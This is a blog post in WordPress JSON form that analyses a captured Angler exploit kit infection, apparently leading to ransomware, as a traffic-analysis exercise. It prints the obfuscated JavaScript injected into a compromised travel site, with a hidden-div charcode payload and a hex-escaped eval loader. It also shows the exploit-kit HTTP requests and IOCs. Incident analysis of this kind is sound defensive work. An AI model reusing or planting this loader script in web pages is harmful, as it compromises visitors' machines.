{"id":437,"date":"2016-03-16T16:31:06","date_gmt":"2016-03-16T16:31:06","guid":{"rendered":"http:\/\/www.herbiez.com\/?p=437"},"modified":"2016-03-16T16:31:06","modified_gmt":"2016-03-16T16:31:06","slug":"malware-exercise-2016-02-28-ideal-versus-reality","status":"publish","type":"post","link":"https:\/\/www.herbiez.com\/?p=437","title":{"rendered":"Malware Exercise 2016-02-28 Ideal versus Reality"},"content":{"rendered":"

So here is another one from Brad<\/a>. Talking to some of the other guys on the team, we all came to the conclusion that this one seemed kind of “generic” (for the lack of a better word); which leads me to believe that I missed something somewhere. LOL. The whole second guessing yourself really does suck at times. But anyways, here is my write-up of this latest one. Enjoy!<\/p>\n

About the Investigation
\n=======================
\n\u2013 Date and time range of the traffic you\u2019re reviewing.
\n> 2016-02-28 22:38:13 – 2016-02-28 22:46:27 Elapsed: 00:08:14<\/p>\n

\u2013 IP address, MAC address, and host name.
\n> 172.16.181.176 \/ 00:c0:4f:f6:3e:74 \/ WIN-DJ3W602WC9M<\/p>\n

\u2013 Description of the activity (what happened, if the host became infected, any details, etc.).
\n> From what I can tell in the PCAP, the end-user went to a compromised site that had a hidden malicious script on the page. The obfuscated Javascript code, I believe, directed the end-user’s browser (IE v8.0) to the malicious site, which then directed the user to download a malcious Flash file. From there the system became compromsied and evidence is seen that some encrypted binaries were downloaded. Based on the alerts from the PCAP, I believe that the system has been infected by CryptoLocker via an Angler EK.<\/p>\n

\u2013 A conclusion with recommendations for any follow-up actions.
\n> At this time I would re-image the system to make sure that it is absolutely clean. I would also start looking at any firewall\/gateway\/DNS logs to see if any of the sites mentioned below can be found and if so, pull them off the network for further investigation.<\/p>\n

\u2013 Indicators of Compromise (IP, FQDN, etc\u2026)
\n> 188.121.54.128 \/ www.mysecretdeals.nl
\n> 85.143.222.170 \/ netmakevitelaoversttelsestidspunkt.timepassion.com
\n> 192.185.39.66 \/ biocarbon.com.ec<\/p>\n

Notes about the investigation
\n==============================<\/p>\n

At approximately 22:43.00 on the 28th of February, the user of the system WIN-DJ3W602WC9M went looking for a travel deal on the site www[.]mysecretdeals[.]nl as seen in the PCAP. From there, it looks as if the site was compromised as there is an obfuscated Javascript found in the code as seen below:<\/p>\n

\r\n\r\n<div id="gzyyontewnvauwa" style="position: absolute; top: -1999px; left: -1370px">byd i 'cm' e rbmbgbc bpesepesbab h cmasb, dbj cbandwc, abvbtdgaad i c sci 'e' ceacsb rc lckaobdbpd ebaeidue, ccuesecd see cqegaf, ag el. ened dleuece s eldbdwd f dp 96 cgcdbsan 57 bi bud w cf bbbrdodncid ueucu 59 e, gakacakbrax ekd ta k alaobm ataka cak cvepa, pac dud ubx a jc eb. yependbdwdecwbpbrbzancl; dze ae ja qb lcp djepc c; b, ucjay azazbuag btdl. dheje desc u bocbbpb - vazbhdlcsepbhbuahbn. b 47 z bves cvdwa vefajakarcdb fbf a zaj cja lerefajak ardh ewe bevdt dgc a, dic, sb xexegdfeeclbybqbdc c de c ndwdsec ambtbu b vemaabr du dybaarcbba b l cab tekdpexd. fdpcg cdbsan bi bu dwb - tagbt c pdjejdxevbbceb jbmclcwecc oct cebobtalb vbuckbs, a pcadkcnb wccbo ahbidsbrcea hbrdn, c. tbt - bnesbc b jbqeiepczem aecobhercca bbobub, i dsctema hc obherbpa. nb lcjbibud aep ahac bp cge saveienc fbuan bo de amdxbmbobeee cf bmchah, cdakaqbsc dbgacbgcfbpbuaabya! v amdx brb, nbab tcd bvesahccd ga p etbqcbbccidsdxenb ab hcpd rce bpbk bebl bu bvcca vbrcndjbrbxc 'bbcbpc' ccfclah bwdqdibqbycaagb nbud w bu bdbpde c oc, ebxbyabb 'jca' dwcfb bbp aydccc bjbzamcle ncibzarbzddd pb rcdbs cscib ycgdx as er acak. e xbxbo amejbj ceduc ze ldl. ae e eb obza k erdue vecdid: w. cmdncj c cb pdhe g e a e x e - cd idw drdj b w blbp bc e je q e q eh cqd yajaoe. obrbnbabtcdbvdw cueddfd nb ve udycnep<\/div>\r\n\r\n\r\n<div id="ejteaztmik" style="position: absolute; top: -1602px; left: -1579px">112;119;105;110;99;101;107;120;111;103;103;107;61;40;43;91;119;105;110;100;111;119;46;115;105;100;101;98;97;\t\t114;93;41;59;99;97;112;103;118;116;119;100;108;113;100;116;119;104;103;61;91;34;114;118;58;49;49;34;44;34;77;83;73;69;34;44;93;59;102;111;114;40;116;114;121;107;106;98;119;101;98;104;61\t\t;112;119;105;110;99;101;107;120;111;103;103;107;59;116;114;121;107;106;98;119;101;98;104;60;99;97;112;103;118;116;119;100;108;113;100;116;119;104;103;46;108;101;110;103;116;104;59;116;1\t\t14;121;107;106;98;119;101;98;104;43;43;41;123;105;102;40;110;97;118;105;103;97;116;111;114;46;117;115;101;114;65;103;101;110;116;46;105;110;100;101;120;79;102;40;99;97;112;103;118;116;1\t\t19;100;108;113;100;116;119;104;103;91;116;114;121;107;106;98;119;101;98;104;93;41;62;112;119;105;110;99;101;107;120;111;103;103;107;41;123;117;122;103;97;99;120;102;111;114;106;118;114;\t\t61;99;97;112;103;118;116;119;100;108;113;100;116;119;104;103;46;108;101;110;103;116;104;45;116;114;121;107;106;98;119;101;98;104;59;98;114;101;97;107;59;125;125;105;102;40;110;97;118;10\t\t5;103;97;116;111;114;46;117;115;101;114;65;103;101;110;116;46;105;110;100;101;120;79;102;40;34;77;83;73;69;49;48;34;41;62;112;119;105;110;99;101;107;120;111;103;103;107;41;123;117;122;1\t\t03;97;99;120;102;111;114;106;118;114;43;43;59;125;117;121;108;121;98;103;109;111;108;116;113;61;117;122;103;97;99;120;102;111;114;106;118;114;45;49;59;117;97;107;120;122;102;105;119;106\t\t;100;115;121;110;61;34;68;55;50;89;66;65;104;76;90;74;90;116;34;59;97;99;104;102;120;120;120;117;114;118;120;117;101;61;100;111;99;117;109;101;110;116;46;103;101;116;69;108;101;109;101;\t\t110;116;66;121;73;100;40;34;103;122;121;121;111;110;116;101;119;110;118;97;117;119;97;34;41;46;105;110;110;101;114;72;84;77;76;59;117;101;108;112;111;106;106;100;97;118;116;98;100;108;6\t\t1;112;119;105;110;99;101;107;120;111;103;103;107;59;99;122;104;101;97;106;116;102;112;115;61;112;119;105;110;99;101;107;120;111;103;103;107;59;102;117;108;114;101;111;111;100;100;104;10\t\t8;118;98;104;109;113;113;61;34;34;59;102;111;114;40;116;114;121;107;106;98;119;101;98;104;61;112;119;105;110;99;101;107;120;111;103;103;107;59;116;114;121;107;106;98;119;101;98;104;60;9\t\t7;99;104;102;120;120;120;117;114;118;120;117;101;46;108;101;110;103;116;104;59;116;114;121;107;106;98;119;101;98;104;43;61;117;121;108;121;98;103;109;111;108;116;113;41;123;101;102;112;\t\t122;118;100;113;120;115;118;111;109;101;120;61;97;99;104;102;120;120;120;117;114;118;120;117;101;46;99;104;97;114;67;111;100;101;65;116;40;116;114;121;107;106;98;119;101;98;104;41;59;10\t\t5;102;40;101;102;112;122;118;100;113;120;115;118;111;109;101;120;62;61;57;55;38;38;101;102;112;122;118;100;113;120;115;118;111;109;101;120;60;61;49;50;50;41;123;105;102;40;117;101;108;1\t\t12;111;106;106;100;97;118;116;98;100;108;37;117;122;103;97;99;120;102;111;114;106;118;114;41;123;102;117;108;114;101;111;111;100;100;104;108;118;98;104;109;113;113;43;61;83;116;114;105;\t\t110;103;46;102;114;111;109;67;104;97;114;67;111;100;101;40;40;40;113;122;102;118;122;120;106;110;114;105;103;113;115;111;109;43;101;102;112;122;118;100;113;120;115;118;111;109;101;120;4\t\t5;57;55;41;94;117;97;107;120;122;102;105;119;106;100;115;121;110;46;99;104;97;114;67;111;100;101;65;116;40;99;122;104;101;97;106;116;102;112;115;37;117;97;107;120;122;102;105;119;106;10\t\t0;115;121;110;46;108;101;110;103;116;104;41;41;37;50;53;53;41;59;99;122;104;101;97;106;116;102;112;115;43;43;59;125;101;108;115;101;123;113;122;102;118;122;120;106;110;114;105;103;113;1\t\t15;111;109;61;40;101;102;112;122;118;100;113;120;115;118;111;109;101;120;45;57;55;41;42;50;54;59;125;117;101;108;112;111;106;106;100;97;118;116;98;100;108;43;43;59;125;125;91;93;91;34;9\t\t9;111;110;115;116;114;117;99;116;111;114;34;93;91;34;99;111;110;115;116;114;117;99;116;111;114;34;93;40;102;117;108;114;101;111;111;100;100;104;108;118;98;104;109;113;113;41;40;41;59<\/ div>\r\n\t<script>\r\n\twobqesyszfi="\\x2e\\x73";\r\n\tnnkhgqgbpsdk="\\x53";\r\n\tnmbekhwxixcb="\\x6e\\x67";\r\n\tjdmqeslorgubbhdk="\\x64\\x6f";\r\n\twobqesyszfi=wobqesyszfi+"\\x70";\r\n\tnmbekhwxixcb=nmbekhwxixcb+"\\x2e\\x66";\r\n\tgxylmrwaor="\\x2e";\r\n\tgxylmrwaor=gxylmrwaor+"\\x61\\x70";\r\n\tjazrnxwtcbwzwld="\\x28";\r\n\tewhhvshumeic="\\x65\\x76\\x61\\x6c";\r\n\tylsxnjfqplhwvl="\\x69\\x6e\\x6e\\x65\\x72";\r\n\tjazrnxwtcbwzwld=jazrnxwtcbwzwld+"\\x22";\r\n\tuyzsesecha="\\x63\\x6f\\x6e";\r\n\tnmbekhwxixcb=nmbekhwxixcb+"\\x72\\x6f";\r\n\tgxylmrwaor=gxylmrwaor+"\\x70\\x6c\\x79\\x28\\x6e\\x75\\x6c\\x6c";\r\n\tjdmqeslorgubbhdk=jdmqeslorgubbhdk+"\\x63\\x75\\x6d";\r\n\tgxylmrwaor=gxylmrwaor+"\\x2c";\r\n\twobqesyszfi=wobqesyszfi+"\\x6c";\r\n\twobqesyszfi=wobqesyszfi+"\\x69\\x74\\x28";\r\n\tylsxnjfqplhwvl=ylsxnjfqplhwvl+"\\x48\\x54";\r\n\tuyzsesecha=uyzsesecha+"\\x73";\r\n\tjdmqeslorgubbhdk=jdmqeslorgubbhdk+"\\x65\\x6e";\r\n\tjdmqeslorgubbhdk=jdmqeslorgubbhdk+"\\x74\\x2e";\r\n\tnnkhgqgbpsdk=nnkhgqgbpsdk+"\\x74\\x72\\x69";\r\n\tblmqgofrutify="\\x6d";\r\n\twobqesyszfi=wobqesyszfi+"\\x22";\r\n\twobqesyszfi=wobqesyszfi+"\\x3b\\x22\\x29\\x29";\r\n\tuyzsesecha=uyzsesecha+"\\x74\\x72\\x75\\x63\\x74";\r\n\tjazrnxwtcbwzwld=jazrnxwtcbwzwld+"\\x65\\x6a";\r\n\tblmqgofrutify=blmqgofrutify+"\\x43\\x68\\x61\\x72\\x43";\r\n\tmlefnllgucu="\\x28";\r\n\thlaybuppfayjd="\\x29";\r\n\tjdmqeslorgubbhdk=jdmqeslorgubbhdk+"\\x67\\x65\\x74";\r\n\tuyzsesecha=uyzsesecha+"\\x6f";\r\n\tjdmqeslorgubbhdk=jdmqeslorgubbhdk+"\\x45";\r\n\tuyzsesecha=uyzsesecha+"\\x72";\r\n\tjazrnxwtcbwzwld=jazrnxwtcbwzwld+"\\x74";\r\n\tjdmqeslorgubbhdk=jdmqeslorgubbhdk+"\\x6c\\x65\\x6d\\x65\\x6e";\r\n\tjazrnxwtcbwzwld=jazrnxwtcbwzwld+"\\x65\\x61";\r\n\tjazrnxwtcbwzwld=jazrnxwtcbwzwld+"\\x7a\\x74\\x6d\\x69\\x6b\\x22\\x29\\x2e";\r\n\tjdmqeslorgubbhdk=jdmqeslorgubbhdk+"\\x74\\x42\\x79\\x49";\r\n\tblmqgofrutify=blmqgofrutify+"\\x6f\\x64\\x65";\r\n\tjdmqeslorgubbhdk=jdmqeslorgubbhdk+"\\x64";\r\n\tylsxnjfqplhwvl=ylsxnjfqplhwvl+"\\x4d\\x4c";\r\n\t[][uyzsesecha][uyzsesecha](ewhhvshumeic + mlefnllgucu + nnkhgqgbpsdk + nmbekhwxixcb + blmqgofrutify + gxylmrwaor + jdmqeslorgubbhdk + jazrnxwtcbwzwld + ylsxnjfqplhwvl + wobqesyszfi + \t\thlaybuppfayjd)();\r\n\t<\/script><\/pre>\n
I was not able to de-obfuscate the top bit of the script, but the bottom part I managed to manually deobfuscate it (I know that there are better ways of doing it, I am just not sure of them and I did not go Googling for it either). The code looks something like this:<\/p>\n
\r\n\twobqesyszfi=.s\r\n\tnnkhgqgbpsdk=S\r\n\tnmbekhwxixcb=ng\r\n\tjdmqeslorgubbhdk=do\r\n\twobqesyszfi=.sp\r\n\tnmbekhwxixcb=ng.f\r\n\tgxylmrwaor=.\r\n\tgxylmrwaor=.ap\r\n\tjazrnxwtcbwzwld=(\r\n\tewhhvshumeic=eval\r\n\tylsxnjfqplhwvl=inner\r\n\tjazrnxwtcbwzwld=("\r\n\tuyzsesecha=con\r\n\tnmbekhwxixcb=ng.fro\r\n\tgxylmrwaor=.apply(null\r\n\tjdmqeslorgubbhdk=docum\r\n\tgxylmrwaor=.apply(null,\r\n\twobqesyszfi=.spl\r\n\twobqesyszfi=.split(\r\n\tylsxnjfqplhwvl=innerHT\r\n\tuyzsesecha=cons\r\n\tjdmqeslorgubbhdk=documen \r\n\tjdmqeslorgubbhdk=document. \r\n\tnnkhgqgbpsdk=Stri \r\n\tblmqgofrutify=m \r\n\twobqesyszfi=.split(" \r\n\twobqesyszfi=.split("")) \r\n\tuyzsesecha=construct \r\n\tjazrnxwtcbwzwld=("ej \r\n\tblmqgofrutify=mCharC \r\n\tmlefnllgucu=(\r\n\thlaybuppfayjd=)\r\n\tjdmqeslorgubbhdk=document.get\r\n\tuyzsesecha=constructo\r\n\tjdmqeslorgubbhdk=document.get+E\r\n\tuyzsesecha=constructor\r\n\tjazrnxwtcbwzwld=("ejt\r\n\tjdmqeslorgubbhdk=("ejtlemen\r\n\tjazrnxwtcbwzwld=("ejtea\r\n\tjazrnxwtcbwzwld=("ejteaztmik").\r\n\tjdmqeslorgubbhdk=("ejtlementByI\r\n\tblmqgofrutify=mCharCode\r\n\tjdmqeslorgubbhdk=("ejtlementById\r\n\tylsxnjfqplhwvl=innerHTML\r\n\t[][constructor][constructor](eval(String.fromCharCode.apply(null,("ejtlementById("ejteaztmik")innerHTML.split(""))))();<\/pre>\n
From here it looks as if the end-user was guided to the malicious site that is hosting the Angler EK as seen here:<\/p>\n
\r\n\tGET \/boards\/viewforum.php?f=58&sid=yr897n65jrb5870 HTTP\/1.1\r\n\tAccept: image\/gif, image\/jpeg, image\/pjpeg, application\/x-ms-application, application\/vnd.ms-xpsdocument, application\/xaml+xml, application\/x-ms-xbap, *\/*\r\n\tReferer: http:\/\/www.mysecretdeals.nl\/\r\n\tAccept-Language: en-us\r\n\tUser-Agent: Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident\/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)\r\n\tAccept-Encoding: gzip, deflate\r\n\tHost: netmakevitelaoversttelsestidspunkt.timepassion.com\r\n\tConnection: Keep-Alive\r\n\t\r\n\tHTTP\/1.1 200 OK\r\n\tServer: nginx\/1.9.12\r\n\tDate: Sun, 28 Feb 2016 22:43:21 GMT\r\n\tContent-Type: text\/html\r\n\tContent-Length: 108254\r\n\tConnection: keep-alive\r\n\tSet-Cookie: 25931d49efb527d3=4; expires=Sun, 28-Feb-2016 22:56:39 GMT; Max-Age=759; path=\/sdfnksjgbkd\r\n\t\r\n\t<!DOCTYPE html>\r\n\t<html>\r\n\t\r\n\t<head>\r\n\t    \r\n\t    <title>\r\n\t        it. here\r\n\t    <\/title>\r\n\t<\/head>\r\n\t\r\n\t<body>\r\n\r\n\r\n\t  lost no time to deliberate and judge." "But I do not know; for WE of course made every necessary arrangement with the fortitude of an affair, a connection--but need\r\n\t\r\n\r\n\t<s>\r\n\t <i>\r\n\t  " "You would not interest.--I know of no profession at all."<\/pre>\n
At this point, it looks like the infection of the system starts as we see a call for a Flash file:<\/p>\n
\r\n\tGET \/state.web?cold=&cost=d5FxlISZeZ&discover=&enter=YLBQglDPR&small=lRl7&four=SnYlNzQTvE&themselves=4k28hYBwac&work=&business=mxCZi HTTP\/1.1\r\n\tAccept: *\/*\r\n\tAccept-Language: en-US\r\n\tReferer: http:\/\/netmakevitelaoversttelsestidspunkt.timepassion.com\/boards\/viewforum.php?f=58&sid=yr897n65jrb5870\r\n\tx-flash-version: 11,9,900,117\r\n\tAccept-Encoding: gzip, deflate\r\n\tUser-Agent: Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident\/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)\r\n\tHost: netmakevitelaoversttelsestidspunkt.timepassion.com\r\n\tConnection: Keep-Alive\r\n\t\r\n\tHTTP\/1.1 200 OK\r\n\tServer: nginx\/1.9.12\r\n\tDate: Sun, 28 Feb 2016 22:43:34 GMT\r\n\tContent-Type: application\/x-shockwave-flash\r\n\tContent-Length: 64564\r\n\tConnection: keep-alive\r\n\tSet-Cookie: ebcdd9a5f0f651f4002=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=\/sdfnksjgbkd\r\n\t\r\n\tCWS\r\n\t....x<\/pre>\n
and then what I believe to be encrypted binaries being pulled down:<\/p>\n
\r\n\tGET \/center.zhtml?white=q4Oi2zp&enjoy=gOwqO&too=d261z&knowledge=BbbhYsrB0E&procedure=-OTumdS2L&low=dZyrI&carry=dChAB8P HTTP\/1.1\r\n\tAccept: *\/*\r\n\tUser-Agent: Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident\/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)\r\n\tReferer: http:\/\/www.mysecretdeals.nl\/\r\n\tAccept-Language: en-us\r\n\tAccept-Encoding: gzip, deflate\r\n\tHost: netmakevitelaoversttelsestidspunkt.timepassion.com\r\n\tConnection: Keep-Alive\r\n\t\r\n\tHTTP\/1.1 200 OK\r\n\tServer: nginx\/1.9.12\r\n\tDate: Sun, 28 Feb 2016 22:43:40 GMT\r\n\tContent-Type: application\/octet-stream\r\n\tContent-Length: 372756\r\n\tConnection: keep-alive\r\n\tSet-Cookie: 86bdef36936e928f0717fa17=ede2aab62cb4b8b4ad5d7595974f368; expires=Sun, 28-Feb-2016 23:39:44 GMT; Max-Age=3325; path=\/sdfnksjgbkd\r\n\t\r\n\te.zgE\r\n\r\n\t-----\r\n\t\r\n\tGET \/thus.zfo?different=IaU_lMeX3O&institution=ICg9nM&success=1DE8hbm9&southern=_TPIKGykTU&direct=UrB1-5IP9Ebbnz HTTP\/1.1\r\n\tAccept: *\/*\r\n\tUser-Agent: Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident\/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)\r\n\tReferer: http:\/\/www.mysecretdeals.nl\/\r\n\tAccept-Language: en-us\r\n\tAccept-Encoding: gzip, deflate\r\n\tHost: netmakevitelaoversttelsestidspunkt.timepassion.com\r\n\tConnection: Keep-Alive\r\n\t\r\n\tHTTP\/1.1 200 OK\r\n\tServer: nginx\/1.9.12\r\n\tDate: Sun, 28 Feb 2016 22:43:52 GMT\r\n\tContent-Type: application\/octet-stream\r\n\tContent-Length: 372756\r\n\tConnection: keep-alive\r\n\tSet-Cookie: 0e67a4b0cb7e67=915cbb5ef5ed1bc926c5593bd1; expires=Sun, 28-Feb-2016 23:09:53 GMT; Max-Age=1523; path=\/sdfnksjgbkd\r\n\t\r\n\t..5...iZ..z.....1...1...17....^KSr.$.Jd....<\/pre>\n
After the first GET request above, we see the start of POSTs being sent to another server:<\/p>\n
\r\n\tPOST \/wp-content\/uploads\/bstr.php HTTP\/1.1\r\n\tContent-Type: application\/x-www-form-urlencoded\r\n\tUser-Agent: Mozilla\/5.0 (Windows NT 6.3; WOW64; Trident\/7.0; Touch; rv:11.0) like Gecko\r\n\tHost: biocarbon.com.ec\r\n\tContent-Length: 645\r\n\tCache-Control: no-cache\r\n\t\r\n\tdata=AFAA7EF96957AF623769DB8A2D403F7F570FF3481F39D30BEB29F7E428F3AFDB2D6CFED0B0DC5E2A736708790A48012595F4DEA6B2A7B39182E75BDA74CEFE1CA987E7A1014847BEED0AEF99D2FB8C926F7DF2A38013FFDCF05\t2FA64C3C8114E11EDB1974CC9C2AC9F60D30C99D4B46FC677CE2C2BE78A8193E3CCD665D2BCE705D7B26C9DCDC93BE02A59CF23C2BE8BFBA168B54329908DCF2445BE1DAF230E29C2262975B95125CB493937C2B5B16BEA5E217C286\t997809A08BBE69F61A0877843C1989A2259419EB2AB946B430A37073F7526E10DB30DAA2BE5BDFA517FAA6AE2DF99D3E8F6AF3895B58A4B35CFCF71DFDB63C3B9B27DE852B3D69\t7C269A8F956ED5ADF62873B2CD11EE42353ECD0023E105005D8C52C53D5AFDF17D3C490DB1C7DCACB1B6395D90CA2525BA9A0A3E9444572C5FC45AB67C2B7929994024AHTTP\/1.1 200 OK\r\n\tServer: nginx\/1.8.1\r\n\tDate: Sun, 28 Feb 2016 22:43:53 GMT\r\n\tContent-Type: text\/html\r\n\tTransfer-Encoding: chunked\r\n\tConnection: keep-alive\r\n\t\r\n\t14\r\n\t---!!!INSERTED!!!---\r\n\t0\r\n\t\r\n\t-----\r\n\r\n\tPOST \/wp-content\/uploads\/bstr.php HTTP\/1.1\r\n\tContent-Type: application\/x-www-form-urlencoded\r\n\tUser-Agent: Mozilla\/5.0 (Windows NT 6.3; WOW64; Trident\/7.0; Touch; rv:11.0) like Gecko\r\n\tHost: biocarbon.com.ec\r\n\tContent-Length: 645\r\n\tCache-Control: no-cache\r\n\t\r\n\tdata=FF982F7A97833388A40909A5E1EBAEE226AE92B7DBCD01C93B775D4D943B4ECF3FADEB176E8A5A9BC046FDF16318A365FCB569428A7A71D6ED10946662AC4157976110F7883000DCB9A2BDBD7F332F2DAB4C22A1DE73BBE57AE\t062F838A6065D73AC39C85578B6F42D9898C433EC3D5AFD77FB1FF2D8594BEF886B235576A753591D61B94B8CEC5C8658393DCA1182FEA1031ADE3DA0DD4D9FB10CB2EC48457751E0A1349A0E66DAE4550D2479D1D453258A8A615A3\tC12852CDB01CE1BA1B77145550DB51829E6DF6574F9ED3F6FCEF64A9D475F6350D4D4F501251872BA1A11254F0AB41C5FE14BF4D33A3002F0345553A1A3020298F383A8B28C2C7\t77A268A722062F6FE6056BA756005575991EFA3217113991C0FA9445CF282D7F091EE7FB8E5BC9E27C82A883B1871A30C6EB3BABDAFE2F390AB4F4C6782DC87E083AC55HTTP\/1.1 200 OK\r\n\tServer: nginx\/1.8.1\r\n\tDate: Sun, 28 Feb 2016 22:44:37 GMT\r\n\tContent-Type: text\/html\r\n\tTransfer-Encoding: chunked\r\n\tConnection: keep-alive\r\n\t\r\n\t14\r\n\t---!!!INSERTED!!!---\r\n\t0<\/pre>\n
And from this point on we don’t see anything else. The only thing that I have been able to get from the PCAP is the Flash file:<\/p>\n
File: netmakevitelaoversttelsestidspunkt.timepassion.com.swf
\nSize: 63.0 KB
\nSHA256: eca4004459c2e8cc148fb4838b7c6f909d796492e9c375e8ee22923fdbc12c0c
\nMD5: d14b011b930bf3b4666f0933a7516912
\nFirst Submission: 2016-02-29 05:36:24 UTC
\nDetection ratio: 22 \/ 56
\nVirustotal link: http:\/\/www.virustotal.com\/en\/file\/eca4004459c2e8cc148fb4838b7c6f909d796492e9c375e8ee22923fdbc12c0c\/analysis\/1457717421\/<\/a><\/p>\n
Based on the results from VirusTotal, and also since we saw the Angler EK page above, this looks to be Angler EK leading to *Crypt infection (either Alpha or Telsa). Unfortunately I am not seeing anything else in the PCAP that shows the landing page of the usual *Crypt infection. As usual, you can find the Flash file and the obfuscated Javascript in my Github repo<\/a>.<\/p>\n","protected":false},"excerpt":{"rendered":"
So here is another one from Brad. Talking to some of the other guys on the team, we all came to the conclusion that this one seemed kind of “generic” (for the lack of a better word); which leads me to believe that I missed something somewhere. LOL. The whole second guessing yourself really does suck at times. But anyways, here is my write-up of this latest one. Enjoy! About the Investigation ======================= \u2013 Date and time range of the traffic you\u2019re reviewing. > 2016-02-28 22:38:13 – 2016-02-28 22:46:27 Elapsed: 00:08:14 \u2013 IP address, MAC address, and host name. >…<\/p>\n
 Continue reading<\/span><\/i><\/a> <\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-437","post","type-post","status-publish","format-standard","hentry","category-packet-analysis"],"_links":{"self":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/437","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=437"}],"version-history":[{"count":4,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/437\/revisions"}],"predecessor-version":[{"id":441,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/437\/revisions\/441"}],"wp:attachment":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=437"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=437"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=437"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}